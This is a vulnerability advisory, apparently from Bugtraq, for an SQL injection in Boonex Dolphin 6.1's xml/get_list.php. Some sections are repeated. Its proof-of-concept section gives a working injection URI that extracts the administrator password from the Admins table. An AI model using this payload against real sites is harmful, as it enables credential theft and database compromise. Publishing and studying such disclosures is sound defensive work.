Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
BID:50286
Info
Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
| Bugtraq ID: | 50286 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 19 2011 12:00AM |
| Updated: | Oct 19 2011 12:00AM |
| Credit: | Yuri Goltsev |
| Vulnerable: |
Boonex Dolphin 6.1 |
| Not Vulnerable: | |
Discussion
Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
Exploit / POC
Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )
Solution / Fix
Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Boonex Dolphin 'xml/get_list.php' SQL Injection Vulnerability
References:
References:
- Dolphin Homepage (Boonex)
- [PT-2011-14] SQL injection vulnerability in BoonEx Dolphin (noreply)
- PT-2011-14: SQL injection vulnerability in BoonEx Dolphin (Yuri Goltsev)